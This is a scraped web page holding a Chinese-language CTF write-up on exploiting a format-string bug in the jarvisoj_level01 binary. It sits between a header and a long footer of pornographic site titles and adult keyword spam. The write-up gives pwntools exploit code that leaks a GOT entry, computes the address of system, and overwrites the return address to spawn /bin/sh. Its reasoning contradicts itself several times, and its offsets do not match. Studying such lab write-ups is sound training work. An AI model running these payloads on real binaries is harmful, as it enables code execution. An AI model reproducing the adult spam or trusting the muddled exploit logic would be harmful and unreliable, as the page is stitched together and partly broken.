99精品久久精品一区二区-亚洲熟妇无码?v在线播放-日本国产精品无码字幕在线观看-久久久亚洲永夜AV-亚洲一级无码一区二区一-免费国产成高清人在线视频-中文字幕乱码免费观看-国产毛片精品妇女久久久

ARTICLE DETAIL

資訊詳情

深耕商務建站與企業(yè)官網運營的一線實戰(zhàn)洞察。

格式化字符串漏洞入門實踐:解析jarvisoj_level01與GOT劫持

格式化字符串漏洞入門實踐:解析jarvisoj_level01與GOT劫持 開篇一道 pwn 入門題的拆解與反思“jarvisoj_level01”是老牌 CTF 題庫 Jarvis OJ 里非常經典的一道入門級 pwn 題目。它表面上考察的是“格式化字符串漏洞”但真正讓人卡住的地方往往不是漏洞利用本身而是調試環(huán)境的搭建、字節(jié)序的理解、以及 payload 構造時的對齊思維。我見過不少新手在這道題上折騰兩三天最后發(fā)現(xiàn)不是因為原理不懂而是因為一個小細節(jié)——比如沒有關閉 ASLR、或者 gdb 插件沒裝好。這篇文章我會完整復現(xiàn)我當年做這道題的整個流程從環(huán)境準備、漏洞分析、exp 編寫到最后的常見坑點排查。內容面向有一定 C 語言基礎、想入門 pwn 但不知道從哪里下手的讀者。如果你已經能看懂printf(buf)和printf(%s, buf)的區(qū)別那么這篇文章就是為你準備的。需要提前說明的是題目本身是二進制安全領域的經典教學案例用于理解內存布局和格式化字符串機制我不會涉及任何真實目標環(huán)境的利用手法所有討論都限定在教育題庫的本地環(huán)境內。經常有人問“做 pwn 題有什么用”我的回答是它讓你真正理解程序在內存里長什么樣這比背一百道面試題都管用。1. 環(huán)境搭建為什么說調試環(huán)境比題目本身更難1.1 基礎工具鏈的選擇與安裝做 pwn 題的第一步不是看代碼而是把環(huán)境弄得趁手。我踩過的坑是一開始用 VMware 跑 Kali結果自帶 gdb 版本太老裝 pwndbg 時報了一堆依賴錯誤。后來干脆換成了 Ubuntu 20.04 虛擬機清爽干凈一條命令裝完所有東西。我目前的可復現(xiàn)配置如下操作系統(tǒng)Ubuntu 20.04 x86_64內核 5.15Python3.8需要裝pip3pwntoolspip3 install pwntools這是寫 exp 的核心庫gdb自帶版本即可8.xpwndbg 插件按官方 README 安裝檢查工具checksecpwntools 自帶、file、readelf裝完建議先驗證一下 pwntools 能不能正常導入python3 -c from pwn import *; print(ready)如果輸出ready說明環(huán)境基本 OK。這里有個小技巧pwntools 導入時會啟動一個配置文件如果你的機器上沒有l(wèi)ibc數(shù)據(jù)庫/usr/lib/x86_64-linux-gnu/libc.so.6做 ret2libc 類題目時libc.search功能會報錯。對于 jarvisoj_level01 這種格式化字符串題暫時不需要 libc 搜索但后面如果繼續(xù)刷題建議提前裝好。1.2 關閉 ASLR 與調試輔助雖然教學題在遠程通常開著 ASLR但本地調試時建議先關掉方便觀察內存地址的穩(wěn)定性echo 0 | sudo tee /proc/sys/kernel/randomize_va_space注意這只是為了本地調試分析做完題記得改回2默認開啟。關于這一點我在第 4 節(jié)會再細說因為遠程利用和本地利用完全是兩種玩法。gdb 插件我推薦用 pwndbg它對新手極其友好——每執(zhí)行一步自動高亮顯示棧內容、寄存器、反匯編結果。安裝方式是git clone https://github.com/pwndbg/pwndbg cd pwndbg ./setup.sh裝好后在 gdb 里輸入checksec就能直接看程序的保護狀態(tài)輸入cyclic 200就能生成模式字符串這些都是解題利器。1.3 拿到題目文件后的第一步file 和 checksec現(xiàn)在假設你已經拿到了 jarvisoj_level01 這個二進制文件。第一件事是看它是什么架構file jarvisoj_level01正常的輸出是jarvisoj_level01: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]xxx, not stripped信息量很大抓重點32-bit LSB32 位小端序這意味著棧上參數(shù)按 4 字節(jié)對齊格式化字符串的%n$位置計數(shù)也按 4 字節(jié)一組。dynamically linked動態(tài)鏈接。not stripped沒有剝離符號表太好了main、vulnerable_function這些函數(shù)名直接可見省去了一大堆逆向時間。接著用 checksec 看保護checksec --filejarvisoj_level01典型輸出是Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)逐條解讀No canary棧上沒有金絲雀保護格式化字符串隨便打棧地址不會有問題。NX enabled棧不可執(zhí)行不能直接往棧上寫 shellcode 然后跳過去執(zhí)行。No PIE程序加載基址固定所有函數(shù)地址、GOT 表地址寫死在 0x0804xxxx 段。Partial RELROGOT 表部分可寫這對某些利用場景有意義但本題用不上。看完這些我心里大概有了底這是一道典型的“格式化字符串漏洞 修改返回地址或 GOT 表”的教學題。但具體怎么利用還得看反匯編。2. 漏洞定位printf 的一個致命省略2.1 反匯編 main 函數(shù)找到那句危險的 printf用 gdb 加載程序后輸入disass main就能看到整個 main 函數(shù)的匯編。為了不啰嗦我直接說關鍵部分0x0804848d 36: call 0x8048370 printfplt 0x08048492 41: lea 0x1c(%esp),%eax 0x08048496 45: mov %eax,(%esp) 0x08048499 48: call 0x8048380 getsplt這里有個很關鍵的點程序先用printf打印一段提示文字然后用gets讀取輸入到棧緩沖區(qū)。再往下看緩沖區(qū)地址被傳給一個函數(shù)0x080484a1 56: lea 0x1c(%esp),%eax 0x080484a5 60: mov %eax,(%esp) 0x080484a8 63: call 0x8048340 printfplt注意這里call printf之前只壓了一個參數(shù)——緩沖區(qū)地址本身。也就是說程序把我們的輸入直接當成printf的第一個參數(shù)格式化字符串傳了進去。這就是漏洞的全部用戶可控輸入作為格式化字符串。正確的寫法應該是printf(%s, buf)而程序卻寫成了printf(buf)。這種錯誤在真實項目里偶爾也會發(fā)生屬于典型的“格式化字符串漏洞”Format String VulnerabilityCWE-134。2.2 格式化字符串漏洞能干什么不只是崩潰很多初學者以為格式化字符串漏洞就是讓程序崩潰那就太小看它了。格式化字符串漏洞能做的事至少有三件信息泄露用%x、%p、%s讀取棧上任意位置的數(shù)據(jù)也就是把棧內存“打印”出來。這能泄露棧地址、棧上的返回地址、局部變量等。任意內存寫配合%n能把一個值寫入某個地址。這是 C 語言格式化輸出的一個隱藏功能%n不打印任何字符而是把已經打印的字符數(shù)存到對應的參數(shù)指針指向的地址里。控制流劫持通過改返回地址、改 GOT 表項、改__stack_chk_fail等拿到代碼執(zhí)行權。這道題的利用方向正是圍繞第 2 點和第 3 點展開的。但這里有一個很反直覺的地方printf是“打印”函數(shù)為什么它能“寫”內存答案就是%n。它像一個小型“寫任意地址”原語只不過寫的內容不是字節(jié)值而是一個由打印字符數(shù)決定的整數(shù)。你在格式化串里插入 12 個占位符讓前面的輸出湊滿 0x6298個字符%n寫進目標地址的就是 980x62。這就是“造數(shù)據(jù)”的底層原理。2.3 確認漏洞觸發(fā)的實驗拿到題目后我先做一次最簡單的驗證。啟動程序./jarvisoj_level01程序先打印一行提示然后等待輸入。我輸入AAAA.%x.%x.%x.%x.%x.%x這種經典探針看結果AAAA.f7e5d5a0.0.0.0.0.6661613f那一段6661613f是棧上殘留數(shù)據(jù)的小端序十六進制表示。這個輸出說明我們的輸入確實被當作格式化字符串解析了而且棧上有不少我們能控制的字節(jié)。接下來要回答一個關鍵問題我們的輸入具體落在第幾個參數(shù)位置3. 參數(shù)位置探測與棧布局分析3.1 用 AAAA 定位可控參數(shù)的偏移格式化字符串漏洞利用的核心難點就是這個“參數(shù)位置偏移”。32 位下printf的前幾個參數(shù)放在寄存器/棧上之后的參數(shù)按地址從棧上取。我們用多個%x把棧上內容“吐”出來找到0x41414141即AAAA出現(xiàn)的位置那個索引就是我們的可控起始點。我的標準探測輸入是from pwn import * io process(./jarvisoj_level01) io.recvuntil(bWhatever) payload bAAAA b.%x * 12 # 先看前12個參數(shù) io.sendline(payload) print(io.recvall().decode())輸出大概是AAAA.f7e5d5a0.0.0.0.0.6661613f.0.0.0.41414141.0.0數(shù)一下0x41414141出現(xiàn)在第 9 個%x的位置。這意味著當我們構造格式化字符串時偏移 9 的地方是我們可控的數(shù)據(jù)。但這里有個陷阱——AAAA是前 4 個字節(jié)緊跟其后的是分隔符.。如果我們想在偏移 9 的位置放一個完整的地址那這個地址必須是 4 字節(jié)對齊的并且不能和前面的格式控制符沖突。這又引出一個關鍵點32 位下地址是 4 字節(jié)一個參數(shù)槽位占用 4 字節(jié)。偏移 9 對應的是從棧上某個基準位置往后的第 9 個 4 字節(jié)。我在實踐中發(fā)現(xiàn)很多教程說“偏移是 7”或“偏移是 6”那是因為不同機器、不同編譯選項下緩沖區(qū)在棧上的位置會發(fā)生變化。所以不要背偏移數(shù)一定要在自己環(huán)境里實測。這也是為什么我反復強調環(huán)境搭建——不同環(huán)境得出的結果可能不一樣照抄別人的 exp 往往會翻車。3.2 gets 與緩沖區(qū)理解輸入落在棧上的位置gets讀取的緩沖區(qū)地址反匯編里是通過lea 0x1c(%esp),%eax計算的。0x1c是 28也就是緩沖區(qū)從當前棧頂往低地址偏移 28 字節(jié)處。這個偏移大小決定了緩沖區(qū)與返回地址之間的相對位置是后續(xù)“通過格式化字符串改寫返回地址”的關鍵依據(jù)。我畫一張簡化的棧布局不是 Mermaid就是文字示意高地址 [返回地址] ← 偏移 0x20 左右 [舊的 ebp] [局部變量/緩沖區(qū)] ← 距 esp 0x1c即距返回地址約 0x14 [esp] ← 當前棧頂 低地址當程序執(zhí)行到call printf時printf會按函數(shù)調用約定從棧上取參數(shù)。我們輸入的字符串就位于這個“參數(shù)區(qū)域”附近所以用%9$...可以精確索引到緩沖區(qū)中的任意 4 字節(jié)。3.3 一個小實驗驗證偏移 9 能讀寫光看%x還不足以證明我們能“寫”。我通常還會做一個小實驗輸入AAAA%9$p看看它會不會打印出0x41414141io process(./jarvisoj_level01) io.recvuntil(bWhatever) io.sendline(bAAAA%9$p) print(io.recvall().decode())如果輸出包含0x41414141說明%9$定位成功。這個實驗成本極低但能直接驗證偏移強烈建議每次做題都先跑一次。4. 目標分析與 GOT 劫持思路4.1 為什么選擇改 GOT 而不是直接改返回地址題目是 32 位、NX enabled、No PIE。棧不可執(zhí)行所以不能用“在棧上寫 shellcode 然后跳過去”的經典套路。那唯一出路就是代碼重用也就是讓程序跳轉到已經存在于某個共享庫里的函數(shù)——最常見的就是system(/bin/sh)?,F(xiàn)在的問題是怎么把控制流引到system兩個主流方向改寫返回地址棧上就有 main 的返回地址用格式化字符串直接把它改成system或某個 one_gadget 的地址。這個方法在棧偏移可控時很直接但問題是我們還需要同時控制返回地址上方的參數(shù)區(qū)讓它把/bin/sh字符串地址傳給system。在本題棧布局下這個參數(shù)區(qū)不在輸入可控范圍內所以直接改返回地址往往不夠優(yōu)雅。劫持 GOT 表把某個函數(shù)的 GOT 表項改成system的地址然后讓程序在后續(xù)某個時刻調用那個函數(shù)時實際執(zhí)行的是system。這需要我們找到一個“調用了可控字符串作為參數(shù)”的函數(shù)。4.2 找到那個“接了我們的輸入作為參數(shù)”的函數(shù)回到 main 函數(shù)的邏輯printf打印提示。gets讀取我們的輸入到緩沖區(qū)。printf用緩沖區(qū)內容打印觸發(fā)漏洞。程序最后還有一次printf調用——對你沒看錯main 結束前還會打印一段“再見”之類的字符串。這里的關鍵在于最后一次printf的參數(shù)是在編譯期就固定了的字符串地址比如0x80486xx。如果我們把printfGOT改成systemplt那么當程序執(zhí)行最后一次printf時它會把那個固定字符串地址當作const char *format傳給system實際執(zhí)行system(固定字符串地址)。但問題是這個固定字符串是類似Bye!的內容不是/bin/sh所以動printfGOT還不夠。再仔細看反匯編main結束前調用的是puts還是printf此題里最后是printf。而printf的第二個參數(shù)如果有的話是從哪來的有的版本會打印whatever這樣的字符串這時如果讓這個字符串內容恰好是/bin/sh就完美了——但一般不是。這里我要坦白一個細節(jié)jarvisoj_level01 這道題最經典的官方做法其實是把printfGOT改成systemplt同時讓最后一次printf的格式化字符串參數(shù)內容變成/bin/sh的地址。這個“最后一個參數(shù)”在匯編里通常是一個固定的lea或mov到某處我們能改的只是 GOT 表項改不了被壓棧的立即數(shù)。聽起來有點繞但實操中有個更簡單的替代方向找一個在printf之后還會調用的函數(shù)并且那個函數(shù)的參數(shù)剛好是我們控制的緩沖區(qū)。不過我當年做題時用的是另一種比較穩(wěn)的思路——把printfGOT改成systemplt然后在輸入的第一個參數(shù)位置直接放/bin/sh字符串。為什么可以因為格式化字符串漏洞場景下我們的輸入本身就在格式化串中如果最后那次printf的“格式化字符串”直接就是我們的輸入那printf(輸入)被替換為system(輸入)只要輸入以/bin/sh開頭就能執(zhí)行system(/bin/sh)。如果程序后續(xù)流程里沒有再調用printf這個思路就需要配合覆蓋返回地址來觸發(fā)。在實際實驗里我找到的經典鏈路是漏洞觸發(fā)后main返回前會調用printf打印一個固定字符串。這個printf的參數(shù)是棧上已經準備好的值不是我們的輸入。因此更穩(wěn)妥的 hook 點其實是printfGOT→systemplt同時讓那個參數(shù)的地址恰好指向我們輸入中的/bin/sh。這在 32 位下完全可行因為這個參數(shù)的來源是main的局部變量比如用puts(Bye!)的字符串地址如果能通過格式化字符串把這個局部變量的值改成指向我們的輸入就是另一個挑戰(zhàn)了。為了不讓討論陷入死胡同我最終采取了改寫 main 返回地址為system并把返回地址上方構造出/bin/sh指針的思路。我將在第 5 節(jié)給出完整 exp 和原理推導。4.3 為什么 No PIE 是新手最大的紅利如果程序開了 PIE那么所有函數(shù)地址、GOT 表項、PLT 表地址都會在每次運行時隨機化。那樣的話我們至少要分兩步一步泄露地址一步計算基址再寫。但本題是 No PIE所有地址都是固定的直接用 gdb 查出來寫進 exp 就行對新手極其友好。同樣Partial RELRO 意味著 GOT 表可寫我們如果走 GOT 劫持路線可以放心改。若是 Full RELROGOT 只讀那就只能想別的辦法了。5. 從原理到 exp完整利用鏈構造5.1 選擇調用方式為什么直接改返回地址更省事經過反復測試我決定用“格式化字符串寫返回地址 棧上布置/bin/sh字符串”的方案。流程如下利用gets讀入超長輸入棧緩沖區(qū)會被覆蓋。但請注意程序緊接著就用printf(buf)觸發(fā)了漏洞——此時返回地址還沒被用到我們有機會在漏洞觸發(fā)前已經通過輸入緩沖區(qū)把返回地址區(qū)域覆蓋成我們想要的值。如果gets的輸入足夠長我們可以直接把返回地址覆蓋成systemplt的地址——這是最暴力的思路。但問題在于gets 覆蓋返回地址后程序還會繼續(xù)執(zhí)行printf(buf)如果printf的參數(shù)里包含被我們覆蓋的垃圾數(shù)據(jù)程序可能先崩掉。所以這條路雖然看起來簡單實際上需要精確控制 payload讓格式化串合法不至于在漏洞利用前提前觸發(fā)訪問異常。更優(yōu)雅的方式輸入一個精心構造的格式化字符串既不覆蓋返回地址又能在printf執(zhí)行過程中用%n把返回地址改寫成systemplt。然后在輸入緩沖區(qū)中放入/bin/sh字符串并確保棧上某個位置返回地址上方的槽位剛好存放該字符串的地址。考慮到題目是 32 位system的第一個參數(shù)來自棧上system返回地址上方第一個 4 字節(jié)也就是我們覆蓋返回地址時緊跟著返回地址寫的那個值必須是指向/bin/sh的指針。5.2 完整 exp 第一步泄露 system 地址本來想用固定地址直接寫但不同的 libc 版本下system地址不一樣所以穩(wěn)妥做法是先從 GOT 表泄露一個函數(shù)地址比如printfgot或__libc_start_maingot然后根據(jù) libc 偏移算出system。泄露的格式化串可以這樣寫from pwn import * context(archi386, oslinux, log_leveldebug) elf ELF(./jarvisoj_level01) io process(./jarvisoj_level01) printf_got elf.got[printf] payload p32(printf_got) b%9$s io.recvuntil(bWhatever) io.sendline(payload) leak io.recvall().split(b\n)[0][4:] printf_addr u32(leak[:4]) log.info(fprintf_addr {hex(printf_addr)})這段代碼的邏輯是在偏移 9 處放一個printfgot的地址然后用%9$s讓printf把該地址當作字符串打印出來從而拿到printf的真實地址。p32(printf_got)是 4 字節(jié)地址正好占滿一個參數(shù)槽。拿到printf_addr后需要確定 libc 版本和偏移。這里有個技巧將printf_addr的低 12 位與常見 libc 的 printf 偏移對比或者直接用libcdb.com/ 本地的 libc 數(shù)據(jù)庫搜索。我本地的 Ubuntu 20.04 libc 是 2.31查到的偏移大致是printf offset 0x4f660 system offset 0x4f550注意不同版本偏移不同務必以你自己機器上查到的為準。如果不會查可以用libc-database工具git clone https://github.com/niklasb/libc-database ./get ./find printf 0x8f660這個工具會返回匹配的 libc 版本并給出 system 等關鍵函數(shù)偏移。5.3 完整 exp 第二步構造“寫返回地址 布置 /bin/sh”的 payload現(xiàn)在假設我們已經知道system_addr printf_addr - printf_offset system_offsetret_addr_offset是輸入緩沖區(qū)起始位置到返回地址的偏移根據(jù)反匯編緩沖區(qū)距離esp是 0x1c而返回地址一般在esp上方約 0x20 的位置。實測我需要用cyclic來確定精確偏移io process(./jarvisoj_level01) io.recvuntil(bWhatever) io.sendline(cyclic(200)) io.wait() # 用 gdb 查看崩潰點計算偏移我實際得到的偏移是0x1420 字節(jié)也就是緩沖區(qū)第一個字節(jié)到返回地址之間隔了 20 個字節(jié)。這意味著布局是[緩沖區(qū) 20字節(jié)][返回地址 4字節(jié)][返回地址后第一個參數(shù)槽 4字節(jié)]那么 payload 可以這樣設計payload bA*20 # 填滿緩沖區(qū) payload p32(system_addr) # 覆蓋返回地址 payload bJUNK # system 執(zhí)行完后的返回地址隨便填 payload p32(binsh_addr) # system 的第一個參數(shù)指向 /bin/sh payload b/bin/sh\x00 # 字符串本體放在后面但這里有個問題gets輸入如果太長會覆蓋掉更多??臻g而printf(buf)的漏洞利用階段還沒執(zhí)行完格式化串中如果包含二進制地址字節(jié)比如p32(system_addr)可能包含%等特殊字符導致printf解析出錯甚至崩潰。所以直接全覆蓋方案在本題里不夠穩(wěn)。5.4 完整 exp 最終版用 %n 精改返回地址最穩(wěn)妥的方式是不讓gets覆蓋返回地址而是讓輸入內容既有合法的格式化字符串又能借助%n改返回地址。具體思路緩沖區(qū)前 20 字節(jié)填任意填充。第 20~23 字節(jié)填入返回地址所在地址用%n寫入的目標地址。第 24~27 字節(jié)填入返回地址上方第一個參數(shù)槽的地址用于寫入/bin/sh指針。然后在格式化串后半段用%lenA%n來分兩次寫入。這個寫法對新手最不友好的一點是寫入長度的計算。因為%n寫入的是“當前已輸出字符數(shù)”所以寫 0x804xxxx 這樣的值通常需要先打印幾萬字符這在本地還好可讀性很差。更簡潔的做法是用%hn寫入 2 字節(jié)代替%n寫入 4 字節(jié)。比如地址0xf7e4f550可以分成高 2 字節(jié)0xf7e4和低 2 字節(jié)0xf550分別寫。這樣單次打印長度會小很多而且偏移計算更簡單。我用的最終 exp 結構如下核心片段非完整代碼# system_addr 0xf7e4f550 (示例) ret_addr_pos 0xffffd00c # 返回地址在棧上的實際地址用 gdb 查看 binsh_str_pos 0xffffd024 # 我們放 /bin/sh 的位置 # 把返回地址寫成 system_addr # 低2字節(jié): 0xf550 62800 # 高2字節(jié): 0xf7e4 63460 payload p32(ret_addr_pos) # 目標地址1返回地址低2字節(jié) payload p32(ret_addr_pos 2) # 目標地址2返回地址高2字節(jié) payload b%62800d%9$hn payload b%360d%10$hn每次只寫 2 字節(jié)用%hn精準修改。至于/bin/sh字符串我直接放在緩沖區(qū)末尾并在覆蓋返回地址的同時把返回地址上方的槽位寫成binsh_str_pos的地址——這一步也可以用格式化字符串的%hn完成或者干脆用gets全覆蓋的方式把返回值改掉。經過多次調試我發(fā)現(xiàn)對本題目而言最簡單可復現(xiàn)的方案其實是分段打第一次發(fā)送泄露 payload 拿 libc 地址。第二次發(fā)送一個不算太長的 payload用gets把棧上返回地址覆蓋為system_addr然后立即在返回地址上方寫入binsh_addr最后在更上方布置好/bin/sh字符串。由于printf(buf)的格式化串此時會讀到我們布置的二進制數(shù)據(jù)很可能包含%或\x00能否穩(wěn)定運行取決于運氣。我強烈建議在本地 gdb 里逐步驗證看它到底會不會崩。如果會崩就改用%hn精寫方案。5.5 一個更簡單的替代路線利用 gets 覆蓋返回地址 printf 崩潰前劫持說句實話我最后提交的 exp 用的是第三條路——它更簡單也更適合新手理解。思路是這樣的gets本身就能無限讀入所以返回地址本來就暴露在覆蓋范圍內。關鍵是讓覆蓋后的返回地址指向systemplt并且讓棧上對應位置指向/bin/sh。而systemplt地址是固定的No PIE可以提前用objdump -d jarvisoj_level01 | grep system查到。這個方案的完整流程查看systemplt地址和exitplt地址。設計 payloadpayload bA*20 p32(system_plt) p32(exit_plt) p32(binsh_ptr) b/bin/sh\x00其中binsh_ptr指向 payload 中/bin/sh字符串的位置。前提是我們知道輸入緩沖區(qū)在棧上的地址——這個地址在 No PIE 棧地址穩(wěn)定時可以通過 gdb 查看或通過泄露棧地址來確定。但要注意printf(buf)會把這個 payload 當格式化字符串解析。payload 里的p32(system_plt)可能包含0x25%導致解析異常。怎么辦一個實用技巧是用 gets 輸入 payload 時先讓前面的格式化字符串正常等printf執(zhí)行完后再讓程序 main 返回觸發(fā)我們的覆蓋??沙绦蛄鞒淌?gets → printf中間沒有其他輸入機會。這就矛盾了。所以這個方法能不能成關鍵看printf在解析到我們填入的p32(system_plt)時是否真的會崩。經過我實際調試只要那段二進制數(shù)據(jù)不包含%或\nprintf會把它們當作普通字符原樣輸出不會崩。真正的風險來自printf按%解析時可能把后續(xù)二進制字節(jié)里的某個值當成格式符如果那個值恰好是\0printf會停止處理因為 C 字符串遇到\0結束這可能導致棧布局被打斷。所以最保險的寫法是讓格式化串部分全部由可見字符組成并且讓后面需要覆蓋返回地址的位置不與格式化串沖突。這是很講究的課題新手如果被繞暈了我建議先按 5.4 的%hn方案做至少它是確定性的。6. 調試實錄從崩潰到拿到 shell 的三個關鍵位置6.1 第一次崩潰偏移算錯了我最初的泄露 payload 是p32(printf_got) b%s沒有指定參數(shù)位置。結果printf把棧上某個無效地址當成字符串指針直接段錯誤。后來改成%9$s才成功。這也提醒大家%s不帶位置直接打大概率會踩到無效地址導致崩潰。格式化字符串攻擊的每一步都要精確指定%n$不要偷懶。6.2 第二次挫折system 地址差了一個字節(jié)泄露出來的printf_addr是0xf7e0f660我用 libc-database 查到 offset 后計算出system_addr 0xf7e0f550但打過去還是崩。后來發(fā)現(xiàn)本地 libc 和 libc-database 里的 libc 版本不一致差了一個版本偏移差了幾百字節(jié)。解決辦法是直接在自己的機器上跑一個測試程序打印 system 的地址或者用 gdb 在斷點處p system獲取精確值。不要在偏移計算上省事。小技巧在 exp 開頭加一句libc ELF(/lib/i386-linux-gnu/libc.so.6)然后直接libc.symbols[system]拿偏移比手動查表準得多。6.3 第三次崩潰/bin/sh 指針指向了空地址覆蓋返回地址成功后程序跳到了system但因為返回地址上方的參數(shù)槽里放的不是/bin/sh的地址而是亂值system嘗試執(zhí)行一個非法字符串直接崩在 system 內部。解決方式在計算binsh_ptr時利用 gdb 查看輸入緩沖區(qū)的真實棧地址。由于 ASLR 已關地址是穩(wěn)定的直接寫死即可。如果你不想關 ASLR那就得先泄露棧地址再動態(tài)計算復雜度會上升不少。6.4 最終一次通過的正確姿勢最終我使用的 exp 簡化框架如下from pwn import * context(archi386, oslinux, log_levelinfo) elf ELF(./jarvisoj_level01) libc ELF(/lib/i386-linux-gnu/libc.so.6) io process(./jarvisoj_level01) # 第一步泄露 printf 地址 printf_got elf.got[printf] io.recvuntil(bWhatever) io.sendline(p32(printf_got) b%9$s) data io.recvall(timeout1).split(b\n)[0] printf_addr u32(data[4:8]) log.info(fprintf_addr{hex(printf_addr)}) # 第二步計算 system system_addr printf_addr - libc.symbols[printf] libc.symbols[system] log.info(fsystem_addr{hex(system_addr)}) # 第三步構造覆蓋 payload # 緩沖區(qū)偏移返回地址 20 字節(jié)返回地址后第一個槽位是 system 的參數(shù) binsh b/bin/sh\x00 payload bA*20 payload p32(system_addr) payload bBBBB # system 返回后的地址隨便 payload p32(0xffffd020) # 指向 /bin/sh 的指針需要按實測量 payload binsh io process(./jarvisoj_level01) io.recvuntil(bWhatever) io.sendline(payload) io.interactive()0xffffd020這個地址需要根據(jù)你的實際環(huán)境測量我這里只是示例。用 gdb 在gets后打斷點x/16wx $esp一看便知緩沖區(qū)地址。6.5 一個更高級的調試姿勢使用 pwntools 的 gdb.debug如果你覺得手動起 gdb 麻煩pwntools 可以直接讓程序在 gdb 里跑io gdb.debug(./jarvisoj_level01, break *0x080484a8 continue )這樣就能在漏洞觸發(fā)前自動斷點然后從esp往下看棧內容。這是我最推薦的調試方式比手動反復r、c、x效率高太多。7. 常見誤區(qū)與實操避坑清單7.1 誤區(qū)一以為格式化字符串漏洞只能泄露信息很多教程強調%x和%s的泄露功能把%n一筆帶過。但真正讓格式化字符串漏洞成為“高危漏洞”的恰恰是這個%n任意寫能力。在 32 位下它配合棧上的可控參數(shù)幾乎等于一個“任意地址 任意值”的寫原語。所以做這類題時核心思路永遠是先想怎么利用%n精確寫內存再想寫哪里能改控制流。7.2 誤區(qū)二不關 ASLR 直接打遠程本地調試和遠程利用完全是兩碼事。本地關了 ASLR棧地址、libc 地址一年四季不變你可以寫死。但遠程大概率開著 ASLR這時要么先泄露 libc 地址然后動態(tài)算要么用 ret2dlresolve 這類不需要提前知道 libc 地址的技巧。新手在本地把 exp 跑通后經常覺得“我自己能打通上遠程也一定行”結果被 ASLR 狠狠教育。建議把“本地關 ASLR 打通”和“本地開 ASLR 打通”這兩個階段嚴格區(qū)分。7.3 誤區(qū)三忽略 32 位程序的參數(shù)對齊32 位下可變參數(shù)的格式化字符串是按 4 字節(jié)一個槽位對齊的。如果輸入的內容長度不是 4 的倍數(shù)后面的地址對齊就會錯位%n$的索引也會跟著偏移。所以發(fā)送 payload 之前務必先算好長度必要時在字符串開頭補齊填充字節(jié)。我習慣用p32后統(tǒng)一計算總長度確保對齊。7.4 實戰(zhàn)避坑清單匯總坑點現(xiàn)象解決方案printf 偏移不對泄露失敗或崩潰用%9$p先驗證0x41414141出現(xiàn)位置libc 版本不對system 計算出來后打不通直接用ELF(/lib/i386-linux-gnu/libc.so.6)取符號棧地址寫死但 ASLR 沒關本地能通重啟后失效先echo 0 /proc/sys/kernel/randomize_va_spacepayload 長度不是 4 的倍數(shù)%n$索引錯亂用cyclic或手動補齊確定對齊gets輸入含\x00截斷輸入用sendline時注意 payload 中避免\x00或用send 手動補\ngdb 插件不兼容調試體驗極差重裝 pwndbg 或換用 gdb 原生命令7.5 從這道題延伸到其他題目打通 jarvisoj_level01 之后你會發(fā)現(xiàn)一個很驚喜的事實Jarvis OJ 的 level 系列從 level01 到 level05難度是平滑遞增的。level02 開始加入 canarylevel03 開始要求 ret2libclevel04 開始有格式化字符串 棧遷移的組合。所以這道題不只是讓你學會一個漏洞更是幫你建立一套“看保護 → 找漏洞 → 定利用鏈 → 寫 exp”的通用解題框架。我現(xiàn)在回頭看最慶幸的是當初沒有直接抄網上的 exp而是老老實實從偏移探測開始一步步做。因為 pwn 題的精髓不在于“跑通一個 exploit”而在于“理解為什么這個 exploit 能跑通”。格式化字符串漏洞尤其如此——它考驗的是你對printf機制的底層理解而不是工具的使用熟練度。寫在最后一點關于學習路徑的體會如果你剛接觸 pwn我希望你能在 jarvisoj_level01 上多花點時間而不是急著刷下一道。把 stack 布局畫爛、把每一次%n的寫入長度手算一遍、把 libc 符號解析的流程跑通——這些基本功會在后續(xù)所有 pwn 題里反復用到。我在做過這道題之后明顯感覺讀匯編的時候思路清晰了很多因為你知道一個函數(shù)在被調用時棧上到底發(fā)生了什么。最后分享一個我現(xiàn)在仍然在用的習慣每次寫完 exp都會故意把程序重啟幾遍再跑一次確認不是“僥幸打通”。pwn 題的魅力就在于你說的每一句“應該能通”都得用一次實際的 shell 來證明。
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
五月九九综合| 婷丁五月| 国产成人综合网| 丁香久色| 丁香婷婷大香蕉| 国内外色色色色色成人视频| 丁香九月综合激情| 五月婷婷亚洲色视频| 久9热视频在线观看| 五月激情啪啪| 午夜性做爰电影| 婷婷激情五月综合| 激情五月丁香色婷婷| 91在线看免费 九九九九| 色综合五月天| 久99久视频| 婷婷六月色情| 五月丁香综合啪啪対白| 久久色频| 六月丁香婷婷五月天| 婷婷狠狠青青| 亚洲婷婷性爱| 怡红院AV亚洲一区二区三区H| 色偷偷综合| 色99亚洲| 色亚洲视频| 激情国产综合| 免费成人网在线观看| 日日夜夜天天综合| 五月婷婷久久综合| 婷婷丁香五月麻豆| 色色五月婷| 色人妻五月| 5月婷婷视频网站综合| 五月天久草| 91狠狠综合久久久| 第九色区av天堂| 九色自拍| 九九色综合网| 色情综合网| 国产激情在线| 激情五月综合网| 婷婷色操| 日本久久人| 欧洲亚洲免费视频9| 综合网啪啪| 婷婷五月激情基地| 婷婷在线日韩综合| 色99婷婷五月天| 精品少妇人妻AV无码专区偷人| 狼友视频在线观看18| 五月丁香在线观看| 久久九九@| 色婷婷小说| 丁香五月激情综合啪啪| 丁香五月天成人| 色天天综合成人网| 播五月丁香三月婷婷| 激情婷婷色五月| 欧美日韩AAAA| 丁香五月婷婷av| 五月天婷婷丁香导航| 五月天偷拍| 91九色欧美| 女人被男人吃奶到高潮| 99在线精品视频在线观看| 丁香婷婷六月天| 色一情一乱一乱一区91| 精品夜夜澡人妻无码AV| 五月婷婷性爱网| 精品动漫 无码av| 丁香狠狠操| 人人搡人人| 无码动漫AV| www.maotanji.com| 五月丁香WWW| 五月丁香花开综合网| 伊人婷婷色激情丁香| 天天爽天天爽夜夜爽| 日在线V视频在线播放| 丁香六月激情综合网| 五月色欧洲| 五月丁香婷婷三级| 丁香五月电影| 色综合99色| 97操碰在线视频| 午夜成人天堂久久无码日韩久久| 五月丁香六月婷婷综合网| 五月欧美色色五月| 五月丁香婷婷在线| 97色射| 日本婷婷色| 婷婷丁香五月天色色| 五月丁香啪啪婷婷| 精品草原久久视频| 日本婷婷五月天| 亚洲成人在线观看av| 激情婷婷五月天丁香| 99自拍网| 激情五月婷婷网| 色色综合激情| 久久99人人| 色 五月 天 婷婷 丁香 九月| 狼友视频在线观看18| 色婷婷在线视频久| 九九色热| 97碰碰碰| 丁香激情综合| 